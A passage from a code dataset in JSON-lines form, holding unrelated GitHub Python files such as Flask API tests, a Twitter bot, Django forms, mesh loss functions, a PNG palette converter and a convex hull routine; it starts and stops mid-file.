book_sign(self, client, is_login: bool=True, post_dict: dict=None) -> dict: \n \"\"\" 签到一个自习预约,只对处于等待签到自习预约有效\"\"\"\n \n post_dict = {\n 'id': 1,\n 'location_x': 121.51372,\n 'location_y': 31.34273\n } if post_dict is None else post_dict\n\n resp = client.post(\"/book/sign\", data=post_dict)\n assert resp.status_code == 200 if is_login else resp.status_code == 401\n return resp.json \n\n\n def book_get_self(self, client, is_login: bool=True) -> dict:\n \"\"\" 获取某用户所有相关的自习预约 \"\"\"\n \n resp = client.get(\"/book/get\")\n assert resp.status_code == 200 if is_login else resp.status_code == 401\n return resp.json\n\n\n def book_get_id(self, client, is_login: bool=True, book_id: int=1) -> dict:\n \"\"\" 获取 id 对应自习预约的详细信息 \"\"\"\n \n resp = client.get(\"/book/id\", query_string={\n 'id': book_id\n })\n assert resp.status_code == 200 if is_login else resp.status_code == 401\n return resp.json\n\n \n def book_admin_get(self, client, is_login: bool=True, is_admin: bool=True) -> dict:\n \"\"\" 获取全部预约 \"\"\"\n \n resp = client.get(\"/book/admin/get_all\")\n assert resp.status_code == 200 if is_login and is_admin else resp.status_code == 401\n return resp.json\n\n\n def book_inform_sign_before_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n \"\"\" 向给定时间未签到预约的用户发送邮件提醒签到 \"\"\"\n minute_45(start_time)\n\n\n def book_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n \"\"\" 将给定时间已签到的预约更新为进行中 \"\"\"\n minute_00(start_time)\n\n\n def book_inform_sign_after_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n \"\"\" 向给定时间未签到预约的用户发送邮件警告违约 \"\"\"\n minute_10(start_time)\n\n\n def book_inform_mark_after_start(self, start_time:datetime=datetime(2023, 4, 15, 7)):\n \"\"\" 向给定时间未签到预约的用户发送邮件通知违约 \"\"\"\n minute_15(start_time)\n\n\nbook_api = Book_api()","repo_name":"Kusunoki0130/Ibooking_Flask","sub_path":"test/book_api_access.py","file_name":"book_api_access.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71417505066","text":"n=0\nfact=1\nwhile (n<6):\n n=int(input(\"Enter n in order to bound S(n) (above or equals to 6) \\n\"))\n \nleft = (3**n-1)//2\nfor i in range (1,n+1):\n fact = fact*i\n \nright = 3*fact-1\nprint(\"The intervals is :\\n\")\nprint(left,\"<= S(\",n,\") <=\",right)\n ","repo_name":"popolito1/Project-1-Schur-s-Number","sub_path":"Exercices/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"729265263","text":"import calendar\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef print_on_image(path):\n allManth=[]\n num = 0\n for i in range(12):\n j=i%len(path)\n my_photo=path[j]\n #image = Image.open(path)\n new_image = Image.new('RGB', (500, 800), (0, 0, 0))\n draw = ImageDraw.Draw(new_image)\n font = ImageFont.truetype(r\"Roboto-Black.ttf\", 50)\n (x, y) = (0, 0)\n color = 'rgb(255, 255, 255)' # black color\n im = Image.open(my_photo)\n im = im.resize((500, 400))\n new_image.paste(im, (0, 0))\n c = calendar.TextCalendar()\n draw.text((0, 0+400), c.formatmonth(2018, i+1, 0, 0), fill=color, font=font)\n # new_image.save(f'greeting_card_{num}.png')\n num += 1\n allManth.append(new_image)\n\n print(allManth)\n return allManth\n\n\n","repo_name":"saramontif/PhotoBot","sub_path":"calender.py","file_name":"calender.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23647527202","text":"import os\nfrom sklearn.datasets import load_iris\nfrom alipy.experiment import State, StateIO\nfrom alipy.toolbox import ToolBox\n\nX, y = load_iris(return_X_y=True)\nsplit_count = 5\ncur_path = os.path.abspath('.')\ntoolbox = ToolBox(X=X, y=y, query_type='AllLabels', saving_path=cur_path)\n\n# split data\ntoolbox.split_AL(test_ratio=0.3, initial_label_rate=0.1, split_count=split_count)\ntrain_ind, test_ind, L_ind, U_ind = toolbox.get_split(round=0)\n# -------Initialize StateIO----------\nsaver = StateIO(round=0, train_idx=train_ind, test_idx=test_ind, init_L=L_ind, init_U=U_ind, saving_path='.')\n# or by using toolbox \n# saver = toolbox.get_stateio(round=0)\n\nsaver.init_L.difference_update([0, 1, 2])\nsaver.init_U.update([0, 1, 2])\n\n# -------Basic operations------------\nst1_batch1 = State(select_index=[1], performance=0.89)\nmy_value = 'my_entry_info'\nst1_batch1.add_element(key='my_entry', value=my_value)\nst1_batch2 = State(select_index=[0, 1], performance=0.89)\nst2_batch1 = State(select_index=[0], performance=0.89)\nst3_batch1 = State(select_index=[2], performance=0.89)\n\nsaver.add_state(st1_batch1)\nsaver.add_state(st1_batch2)\nsaver.add_state(st2_batch1)\n\nsaver.save()\n\nprev_st = saver.get_state(index=1) # get 2nd query\n# or use the index operation directly\nprev_st = saver[1]\n\nvalue = prev_st.get_value(key='select_index')\n# or use the index operation directly\nvalue = prev_st['select_index']\n\n# ---------Recover workspace---------\ntrain, test, L, U = saver.get_workspace(iteration=1)\n# or recover the saver itself\nsaver.recover_workspace(iteration=1)\n\nsaver = StateIO.load(path='./AL_round_0.pkl')\ntrain, test, L, U = saver.get_workspace() # will return the latest workspace\n","repo_name":"NUAA-AL/ALiPy","sub_path":"examples/tools/StateIO_usage.py","file_name":"StateIO_usage.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":836,"dataset":"github-code","pt":"37"} +{"seq_id":"13802724378","text":"import torch\nimport numpy as np\n\ndef smoothness_loss_parameters(faces):\n faces = faces.detach().cpu().numpy()\n vertices = np.concatenate((faces[:, 0:2], faces[:, 1:3]), axis=0)\n vertices = list(set([tuple(v) for v in np.sort(vertices)]))\n\n v0s = np.array([v[0] for v in vertices], dtype=np.int32)\n v1s = np.array([v[1] for v in vertices], dtype=np.int32)\n v2s = []\n v3s = []\n for v0, v1 in zip(v0s, v1s):\n count = 0\n for face in faces:\n if v0 in face and v1 in face:\n v = np.copy(face)\n v = v[v!=v0]\n v = v[v!=v1]\n if count == 0:\n v2s.append(int(v[0]))\n count += 1\n else:\n v3s.append(int(v[0]))\n v2s = np.array(v2s, np.int32)\n v3s = np.array(v3s, np.int32)\n return v0s, v1s, v2s, v3s\n\ndef iou(data1, data2):\n batch_size = data1.shape[0]\n axes = tuple(range(data1.dim())[1:])\n intersection = torch.sum(data1*data2, dim=axes)\n union = torch.sum(data1 + data2 - data1 * data2, dim=axes)\n return torch.sum(intersection/union) / batch_size\n\ndef iou_loss(data1, data2):\n return 1 - iou(data1, data2)\n\n\ndef smoothness_loss(vertices, parameters, eps=1e-6):\n # make v0s, v1s, v2s, v3s\n v0s, v1s, v2s, v3s = parameters\n batch_size = vertices.shape[0]\n\n # compute angle of two adjacent triangles\n # notations are illustrated in https://github.com/hiroharu-kato/mesh_reconstruction/blob/master/data/misc/smooth_loss.png\n # This code computes the angle using vectors c1->b1 and c2->b2\n\n # get a1 and b2\n # * triangle A: [v0, v1, v2]\n # * triangle B: [v0, v1, v3]\n # v0s.shape == [batch size, num of triangle pairs, 3(xyz)].\n v0s = vertices[:, v0s, :]\n v1s = vertices[:, v1s, :]\n v2s = vertices[:, v2s, :]\n v3s = vertices[:, v3s, :]\n a1 = v1s - v0s\n b1 = v2s - v0s\n\n # compute dot and cos of a1 and b1\n a1l2 = torch.sum(a1**2, dim=-1)\n b1l2 = torch.sum(b1**2, dim=-1)\n a1l1 = torch.sqrt(a1l2 + eps)\n b1l1 = torch.sqrt(b1l2 + eps)\n ab1 = torch.sum(a1 * b1, dim=-1)\n cos1 = ab1 / (a1l1 * b1l1 + eps)\n sin1 = torch.sqrt(1 - cos1**2 + eps)\n\n # c1 = (a1/|a1|) * (|b1|*cos) = a1 * dot(a1, b1) / |a1|^2\n c1 = a1 * (ab1 / (a1l2 + eps))[:, :, None].expand_as(a1)\n\n # vector of c1->b1, and its length\n cb1 = b1 - c1\n cb1l1 = b1l1 * sin1\n\n # same computation for triangle B\n a2 = v1s - v0s\n b2 = v3s - v0s\n a2l2 = torch.sum(a2**2, dim=-1)\n b2l2 = torch.sum(b2**2, dim=-1)\n a2l1 = torch.sqrt(a2l2 + eps)\n b2l1 = torch.sqrt(b2l2 + eps)\n ab2 = torch.sum(a2 * b2, dim=-1)\n cos2 = ab2 / (a2l1 * b2l1 + eps)\n sin2 = torch.sqrt(1 - cos2**2 + eps)\n c2 = a2 * (ab2 / (a2l2 + eps))[:, :, None].expand_as(a2)\n cb2 = b2 - c2\n cb2l1 = b2l1 * sin2\n\n # cos of c1b1 and c2b2\n cos = torch.sum(cb1 * cb2, dim=-1) / (cb1l1 * cb2l1 + eps)\n\n loss = torch.sum((cos + 1)**2) / batch_size\n return loss","repo_name":"jingma-git/neural_rendering","sub_path":"neural_mesh_renderer/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1631501960","text":"from config import get_tweepy_api\nfrom researcher import TwitterResearcher\nfrom publisher import TwitterPublisher\nfrom filters import TwitterFilter\n\nTERM_LIST = [\"dogecoin\", \"doge\", \"dogearmy\", \"dogeday\"]\n\ndef bot_routine(searcher, publisher):\n \"\"\"\n Perform bot routine, research and post list of tweet.\n\n Prepare mutliple list to be posted at once in a single thread.\n \"\"\"\n #Search tweets from certified account\n certified_tweets = searcher.search(TERM_LIST,\n certified=True, tweet_filter=TwitterFilter())\n publisher.store_tweet_list(\"Certified Account ✅\", certified_tweets)\n\n #Search tweets with some social activity, with\n #minimal likes, retweets or replies.\n low_limit = 150\n active_tweets = searcher.search(TERM_LIST, certified=False,\n tweet_filter=TwitterFilter(), min_faves=low_limit,\n min_retweets=low_limit, min_replies=low_limit)\n publisher.store_tweet_list(\"Active tweet 🚀\", active_tweets)\n\n #Publish each stored list on Twitter as a single thread.\n publisher.post_thread()\n\nif __name__ == \"__main__\":\n api = get_tweepy_api()\n bot_routine(TwitterResearcher(api), TwitterPublisher(api))\n","repo_name":"branchmaster/DogeCoin-Twitter-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4367947657","text":"# leetcode submit region begin(Prohibit modification and deletion)\nfrom heapq import heappush, heappop\n\n\nclass StockPrice:\n def __init__(self):\n self.timePriceMap = {}\n self.pqMax = []\n self.pqMin = []\n self.maxTimeStamp = 0\n\n def update(self, timestamp: int, price: int) -> None:\n self.maxTimeStamp = max(self.maxTimeStamp, timestamp)\n heappush(self.pqMax, (-price, timestamp))\n heappush(self.pqMin, (price, timestamp))\n self.timePriceMap[timestamp] = price\n\n def current(self) -> int:\n return self.timePriceMap[self.maxTimeStamp]\n\n def maximum(self) -> int:\n while True:\n price, timestamp = self.pqMax[-1]\n if self.timePriceMap[timestamp] == -price:\n return -price\n heappop(self.pqMax)\n\n def minimum(self) -> int:\n while True:\n price, timestamp = self.pqMin[-1]\n if self.timePriceMap[timestamp] == price:\n return price\n heappop(self.pqMin)\n\n\n\n# Your StockPrice object will be instantiated and called as such:\n# obj = StockPrice()\n# obj.update(timestamp,price)\n# param_2 = obj.current()\n# param_3 = obj.maximum()\n# param_4 = obj.minimum()\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P2034_StockPriceFluctuation.py","file_name":"P2034_StockPriceFluctuation.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22845552115","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path('', views.homepage, name='homepage.html'),\n path('homepage', views.homepage, name='homepage.html'),\n path('homepage/addblog', views.addblog, name='addblog'),\n path('homepage/seeblogs', views.seeblogs, name='seeblogs'),\n path('homepage/seebyid', views.seebyid, name='seebyid'),\n path('homepage/deletebyid', views.deletebyid, name='deletebyid'),\n path('homepage/update', views.update, name='update'),\n path('homepage/seecomment', views.seecomment, name='seecomment'),\n path('homepage/addcomment', views.addcomment, name='addcomment'),\n]\n\n","repo_name":"Akshayjain60165/Blog-operations","sub_path":"contents/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24769467016","text":"# import random\n# arr = []\n# try :\n# n = int(input(\"Enter the size of array: \"))\n# for i in range(0,n):\n# arr.append(random.randint(1, 100))\n# print(arr)\n# except (ValueError,NameError,RecursionError) as f:\n# print(\"ERROR!!Please put integer as size!!\")\n\n# # def second_max(array,left,right):\n# # if left==right:\n# # maximum1 = array[left]\n# # return maximum1,-1\n# # elif right-left ==1:\n# # maximum1 = max(arr[left],arr[right])\n# # maximum2 = min(arr[left],arr[right])\n# # return maximum1,maximum2\n# # else:\n# # mid = (left+right)//2\n# # maxi,maxii = second_max(array, left, mid)\n# # max3,max4 = second_max(array, mid+1, right)\n# # if maxi< max3:\n# # temp1 = max3\n# # if maxisecmax2:\n# # return secmax1\n# # else:\n# # return secmax2\nimport random as rd\ndef find_second_max(arr, start, end):\n if start == end:\n return arr[start], float('-inf')\n if start + 1 == end:\n return (arr[start], arr[end]) if arr[start] > arr[end] else (arr[end], arr[start])\n mid = (start + end) // 2\n left_max, left_second_max = find_second_max(arr, start, mid)\n right_max, right_second_max = find_second_max(arr, mid + 1, end)\n second_max = max(left_second_max, right_second_max, min(left_max, right_max))\n if left_max > right_max:\n return left_max, second_max\n else:\n return right_max, second_max\n\nif __name__ == \"__main__\": \n try:\n n = int(input(\"Enter the size of the array: \"))\n if n >0:\n arr = [rd.randint(1, 100) for _ in range(n)] # Generate a random array\n print(\"Array:\", arr)\n _, second_largest = find_second_max(arr, 0, n-1)\n print(\"Second Largest:\", second_largest)\n else:\n print(\"Enter size as positive numbers\")\n except ValueError:\n print(\"ERROR!! Please input an integer as the size.\")\n\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/dc_second_large.py","file_name":"dc_second_large.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1594544050","text":"import png\nimport itertools\nfrom io import BytesIO\n\nimport pebble_image_routines\n\n# color reduction methods\nTRUNCATE = \"truncate\"\nNEAREST = \"nearest\"\nCOLOR_REDUCTION_CHOICES = [TRUNCATE, NEAREST]\nSUPPORTED_PALETTES = ('pebble2', 'pebble64')\nDEFAULT_COLOR_REDUCTION = NEAREST\n\n# Public APIs\ndef convert_png_to_pebble_png(input_filename, output_filename,\n palette_name, color_reduction_method=DEFAULT_COLOR_REDUCTION,\n bitdepth=None):\n \"\"\"\n Convert a png to a pblpng and write it to output_filename\n \"\"\"\n\n output_png_writer, image_data = _convert_png_to_pebble_png_writer(\n input_filename, palette_name, color_reduction_method, force_bitdepth=bitdepth)\n\n with open(output_filename, 'wb') as output_file:\n output_png_writer.write_array(output_file, image_data)\n\n\ndef convert_png_to_pebble_png_bytes(input_filename, palette_name,\n color_reduction_method=DEFAULT_COLOR_REDUCTION,\n bitdepth=None):\n \"\"\"\n Convert a png to a pblpng and return a string with the raw data\n \"\"\"\n\n output_png, image_data = _convert_png_to_pebble_png_writer(\n input_filename, palette_name, color_reduction_method, force_bitdepth=bitdepth)\n\n output_str = BytesIO()\n output_png.write_array(output_str, image_data)\n\n return output_str.getvalue()\n\n\n# Implementation\ndef _convert_png_to_pebble_png_writer(input_filename, palette_name, color_reduction_method,\n force_bitdepth=None):\n input_png = png.Reader(filename=input_filename)\n\n # sbit breaks pypngs convert_rgb_to_rgba routine\n # and is unnecessary, as it is only an optional optimization\n # so disable it by loading the PNG pre-data and disabling sbit\n input_png.preamble()\n input_png.sbit = None\n\n # open as RGBA 32-bit (allows for simpler parsing cases)\n width, height, pixels, metadata = input_png.asRGBA8()\n\n # convert RGBA 32-bit boxed rows to list for output\n rgba32_list = grouper(itertools.chain.from_iterable(pixels), 4)\n\n color_reduction_func = pebble_image_routines.get_reduction_func(palette_name,\n color_reduction_method)\n is_grey, has_alpha, bitdepth, palette = get_palette_for_png(input_filename,\n palette_name,\n color_reduction_method)\n\n if force_bitdepth is not None:\n if bitdepth > force_bitdepth:\n raise Exception(\"Tried to force {} bits; need at least {}.\"\n .format(force_bitdepth, bitdepth))\n\n # If we're forcing a particular bitdepth, and it's not the one we were going\n # to use, skip the greyscale dance.\n if bitdepth != force_bitdepth:\n is_grey = False\n bitdepth = force_bitdepth\n\n transparent_grey = None\n # determine the grey value for tRNs transparency\n if is_grey and has_alpha:\n if bitdepth == 4:\n # 4 available shades of grey are occupied\n transparent_grey = 0xC # bitdepth 4 supported value\n else:\n greyscale_list = [0, 255, 85, 170] # in order of bitdepth required\n for lum in greyscale_list:\n # find the first unused greyscale value in terms of available bitdepth\n if (lum, lum, lum, 255) not in palette:\n # transparent grey value for requested greyscale bitdepth\n transparent_grey = lum >> (8 - bitdepth)\n break\n\n # second pass of pixel data, converts rgba32 pixels to greyscale or palettized output\n image = []\n for (r, g, b, a) in rgba32_list:\n # operating on original pixel values, need to do the same color reduction\n # as when the palette was generated\n (r, g, b, a) = color_reduction_func(r, g, b, a)\n\n if is_grey:\n # convert red channel (as luminosity value) to a greyscale at bitdepth\n # if transparent, output the transparent_grey value for that bitdepth\n if a == 0:\n image.append(transparent_grey)\n else:\n image.append(r >> (8 - bitdepth))\n elif has_alpha:\n # append the palette index for output\n image.append(palette.index((r, g, b, a)))\n else:\n # append the palette index for output\n image.append(palette.index((r, g, b)))\n\n if is_grey:\n # remove the palette for greyscale output with writer\n palette = None\n\n output_png = png.Writer(width=width, height=height, compression=9, bitdepth=bitdepth,\n palette=palette, greyscale=is_grey, transparent=transparent_grey)\n\n return (output_png, image)\n\n\ndef get_palette_for_png(input_filename, palette_name, color_reduction_method):\n input_png = png.Reader(filename=input_filename)\n\n # sbit breaks pypngs convert_rgb_to_rgba routine\n # and is unnecessary, as it is only an optional optimization\n # so disable it by loading the PNG pre-data and disabling sbit\n input_png.preamble()\n input_png.sbit = None\n\n # open as RGBA 32-bit (allows for simpler parsing cases)\n width, height, pixels, metadata = input_png.asRGBA8()\n\n palette = [] # rgba32 image palette\n is_grey = True # does the image only contain greyscale pixels (and only full or opaque)\n has_alpha = False # does the image contain alpha\n\n # iterators are one shot, so make a copy of just the iterator and not the data\n # to be able to parse the data twice (we do not modify the pixel data itself)\n # once to generate the palette\n # once to output the final pixel data as greyscale or palette indexes\n pixels, pixels2 = itertools.tee(pixels)\n\n # Figure out what color reduction algorithm we should be using.\n color_reduction_func = pebble_image_routines.get_reduction_func(palette_name,\n color_reduction_method)\n\n # convert RGBA 32-bit image colors to pebble color table\n for (r, g, b, a) in grouper(itertools.chain.from_iterable(pixels2), 4):\n (r, g, b, a) = color_reduction_func(r, g, b, a)\n\n if (r, g, b, a) not in palette:\n palette.append((r, g, b, a))\n # Check if image contains any transparent pixels\n if (a != 0xFF):\n has_alpha = True\n # greyscale only if rgb is gray and opaque or fully transparent\n if is_grey and not (((r == g == b) and a == 255) or (r, g, b, a) == (0, 0, 0, 0)):\n is_grey = False\n\n # Calculate required bit depth\n\n # get the bitdepth for the number of colors\n bitdepth = pebble_image_routines.num_colors_to_bitdepth(len(palette))\n if is_grey:\n # for Greyscale, it is the required colors that set the bitdepth\n # so if image contains LightGray or DarkGray it requires bitdepth 2\n if (85, 85, 85, 255) in palette or (170, 170, 170, 255) in palette:\n # if palette contains all 4 greyscale and transparent, bump up bitdepth\n if (len(palette)) >= 5:\n grey_bitdepth = 4\n else:\n grey_bitdepth = 2\n else:\n # if palette contains black, white and transparent, bump up bitdepth\n if (len(palette)) >= 3:\n grey_bitdepth = 2\n else:\n grey_bitdepth = 1\n if grey_bitdepth > bitdepth:\n is_grey = False\n else:\n bitdepth = grey_bitdepth\n\n # update data for RGB output format\n if not has_alpha:\n # recreate the palette without an alpha channel to support RGB PNG\n palette = [(p_r, p_g, p_b) for p_r, p_g, p_b, p_a in palette]\n\n return is_grey, has_alpha, bitdepth, palette\n\n\ndef grouper(iterable, n, fillvalue=None):\n from itertools import zip_longest\n\n args = [iter(iterable)] * n\n return zip_longest(fillvalue=fillvalue, *args)\n\n\ndef get_ideal_palette(is_color=False):\n if is_color:\n return 'pebble64'\n else:\n return 'pebble2'\n\n\ndef main():\n import argparse\n\n parser = argparse.ArgumentParser(\n description='Convert PNG to 64-color palettized or grayscale PNG')\n parser.add_argument('input_filename', type=str, help='png file to convert')\n parser.add_argument('output_filename', type=str, help='converted file output')\n parser.add_argument('--palette', type=str, required=False,\n choices=SUPPORTED_PALETTES, default='pebble64',\n help=\"Specify the standard palette of the resulting png. Colors will be \"\n \"converted to this lower bit depth using the color_reduction_method \"\n \"arg.\")\n parser.add_argument('--color_reduction_method', metavar='method', required=False,\n nargs=1, default=NEAREST, choices=COLOR_REDUCTION_CHOICES,\n help=\"Method used to convert colors to Pebble's color palette, \"\n \"options are [{}, {}]\".format(NEAREST, TRUNCATE))\n args = parser.parse_args()\n\n convert_png_to_pebble_png(args.input_filename, args.output_filename,\n args.palette, args.color_reduction_method)\n\nif __name__ == '__main__':\n main()\n","repo_name":"pebble-dev/RebbleOS","sub_path":"Utilities/pebblepng.py","file_name":"pebblepng.py","file_ext":"py","file_size_in_byte":9431,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"37"} +{"seq_id":"33763113649","text":"import numpy as np\nimport cv2\nfrom scipy.ndimage.filters import gaussian_filter\n\ncap = cv2.VideoCapture('/home/alien/Documents/opencv/videos/pipeinsp.avi')\n\nwhile(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n '''\n # remove noise\n img = cv2.GaussianBlur(gray,(3,3),10)\n\n # convolute with proper kernels\n laplacian = cv2.Laplacian(img,cv2.CV_64F)\n sobelx = np.absolute(cv2.Sobel(img,cv2.CV_64F,1,0,ksize=5)) # x\n sobely = cv2.Sobel(img,cv2.CV_64F,0,1,ksize=5) # y\n '''\n\n img = cv2.Canny(img,140,200)\n # Display the resulting frame\n cv2.imshow('frame',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"RobinsonGarcia/cs231n-Spring2017","sub_path":"opencv/opencv_tut.py","file_name":"opencv_tut.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6054408027","text":"\n#coding=UTF-8\n\n\nfrom element import *\nfrom Divider import *\n\nclass Convexhull:\n def __init__(self,points,upper=None,lower=None):\n self.points = points\n self.upper = upper\n self.lower = lower\n \n @staticmethod\n def Do_convexhull(points):\n #三點以下直接把點連在一起 兩點=直線 三點=三角形\n if len(points) <= 3:\n Point.sort_counterclockwisely(points)\n #print(points)\n return Convexhull(points)\n elif(len(points)>3 and Point.if_collinear(points)) :\n Point.sort_counterclockwisely(points)\n return Convexhull(points) \n points.sort(key=lambda p: [p.y,p.x]) #由x排序小到大\n half = int(len(points)/2)\n c_l = Convexhull.Do_convexhull(points[:half])\n c_r = Convexhull.Do_convexhull(points[half:])\n return Convexhull.divider(c_l,c_r)\n \n @staticmethod\n def divider(c_l,c_r):\n p_up,q_up,p_low,q_low,points = Convexhull.merge(c_l,c_r)\n d_up = Divider.Do_divider(p_up,q_up) #upperline 的中垂線\n d_low = Divider.Do_divider(p_low,q_low) #lowerline的中垂腺\n return Convexhull(points,upper=d_up,lower = d_low)\n @staticmethod\n def if_leftturn(p1,p2,p3):\n v1 = Vector.vector_is(p1,p2)\n v2 = Vector.vector_is(p1,p3)\n return Vector.crossproduct(v1,v2) < 0\n \n @staticmethod\n def if_rightturn(p1,p2,p3):\n v1 = Vector.vector_is(p1,p2)\n v2 = Vector.vector_is(p1,p3)\n return Vector.crossproduct(v1,v2) > 0\n\n @staticmethod\n def merge(c_l,c_r):\n\n Point.sort_counterclockwisely(c_l.points)\n Point.sort_counterclockwisely(c_r.points)\n p = c_l.points.index(max(c_l.points,key = lambda p:p.x))\n q = c_r.points.index(min(c_r.points,key = lambda p:p.x))\n\n plen = len(c_l.points)\n qlen = len(c_r.points)\n copy_p = p \n copy_q = q \n\n #upper\n prev_p = None\n prev_q = None\n\n while(1):\n prev_p = p \n prev_q = q \n while (Convexhull.if_leftturn(c_l.points[p],c_r.points[q],c_r.points[(q-1+qlen)%qlen])): #c_r的點由逆時針排序 因此要找尋的下一個順時針的點 = 上一個index\n q = (q-1+qlen)%qlen\n while (Convexhull.if_rightturn(c_r.points[q],c_l.points[p],c_l.points[(p+1+plen)%plen])) : #c_l的點由逆時針排序 因此要找尋的下一個逆時針點=下一個index\n p = (p+1+plen)%plen\n if p == prev_p and q == prev_q :\n break\n \n #lower\n prev_p = None\n prev_q = None\n while(1):\n prev_p = copy_p\n prev_q = copy_q \n while (Convexhull.if_rightturn(c_l.points[copy_p],c_r.points[copy_q],c_r.points[(copy_q+1+qlen)%qlen])):\n copy_q = (copy_q+1+qlen)%qlen\n while (Convexhull.if_leftturn(c_r.points[copy_q],c_l.points[copy_p],c_l.points[(copy_p-1+plen)%plen])):\n copy_p = (copy_p-1+plen)%plen\n if copy_p == prev_p and copy_q == prev_q:\n break\n\n result = []\n #[:X] = 前X項 [x:]從第x個開始取\n if(copy_p < p):\n result += c_l.points[:copy_p+1]+c_l.points[p:]\n else:\n result += c_l.points[p:copy_p+1]\n\n if(q < copy_q):\n result += c_r.points[:q+1] + c_r.points[copy_q:]\n else: \n result += c_r.points[copy_q:q+1]\n\n Point.sort_counterclockwisely(result)\n return (c_l.points[p],c_r.points[q],c_l.points[copy_p],c_r.points[copy_q],result)\n \n\n\n","repo_name":"yupeiii/algo_voronoi","sub_path":"Convexhull.py","file_name":"Convexhull.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40567915025","text":"from .base_screens import Screens\nfrom .cat_screens import ProfileScreen, ChangeGenderScreen, ChangeNameScreen, ExileProfileScreen, GenderChangedScreen, NameChangedScreen\nfrom .clan_creation_screens import ClanCreatedScreen, MakeClanScreen\nfrom .clan_screens import ClanScreen, StarClanScreen, DFScreen, ListScreen, AllegiancesScreen\nfrom .event_screens import EventsScreen, SingleEventScreen, PatrolEventScreen, RelationshipEventScreen\nfrom .organizational_screens import\\\n StartScreen, SettingsScreen, InfoScreen, SwitchClanScreen, LanguageScreen, RelationshipSettingsScreen, StatsScreen\nfrom .patrol_screens import PatrolScreen\nfrom .relation_screens import\\\n RelationshipScreen, ChooseMateScreen, ViewChildrenScreen, ChooseMentorScreen\nfrom .world_screens import MapScreen, OutsideClanScreen\n\n# ---------------------------------------------------------------------------- #\n# UI RULES #\n# ---------------------------------------------------------------------------- #\n\"\"\"\nSCREEN: 700 height x 800 width\n\nMARGINS: 25px on all sides\n ~Any new buttons or text MUST be within these margins.\n ~Buttons on the edge of the screen should butt up right against the margin. \n (i.e. the <
', classifier.classify(extract_features(name, i)))\n","repo_name":"JohnnySunkel/BlueSky","sub_path":"NLP/gender_identifier.py","file_name":"gender_identifier.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"406887598","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\n#from base.views import job_Description\nfrom .models import CustomUser, JobApplicant\n\nclass UserRegistrationForm(UserCreationForm):\n email = forms.EmailField(required = True) \n class Meta:\n model = CustomUser\n fields = ( 'email', 'password1', 'password2')\n def save(self, commit = True):\n user = super(UserRegistrationForm, self).save(commit = False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save()\n return user\nclass UserLoginForm(UserChangeForm):\n \n class Meta:\n model = CustomUser\n fields = (\"email\",)\n\nclass ApplicationForm(forms.ModelForm):\n def __init__(self, **kwargs):\n\n self.base_fields['user'].initial = kwargs.pop('user', None)\n self.base_fields['job_description'].initial = kwargs.pop('job_description', None)\n \n\n super(ApplicationForm, self).__init__(**kwargs)\n print(self.fields)\n \n resume = forms.FileField() \n \n class Meta:\n model = JobApplicant\n \n fields = '__all__'\n exclude = ['status']\n \n def save(self, commit=True, *args, **kwargs):\n u = super(ApplicationForm, self).save(commit=False, *args, **kwargs)\n if commit:\n u.save()\n return u \n\n\n'''class ApplicationForm(forms.ModelForm):\n #job_description = forms.CharField(max_length=30)\n first_name = forms.CharField(max_length = 20)\n last_name = forms.CharField(max_length = 25)\n email = forms.EmailField(max_length = 50)\n contact_number = forms.CharField(max_length = 12)\n resume = forms.FileField()\n notice_period = forms.IntegerField()\n\n class Meta():\n model = JobApplicant\n fields = (\n \n 'first_name',\n 'last_name',\n 'email',\n 'contact_number',\n 'resume',\n 'notice_period',\n ) \n \n def save(self, commit = True):\n user = super(ApplicationForm, self).save(commit = False)\n user.email = self.cleaned_data['email']\n if commit:\n user.save(commit = True)\n return user\n \n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n\n try:\n CustomUser.objects.get(email=email)\n\n except CustomUser.DoesNotExist:\n return 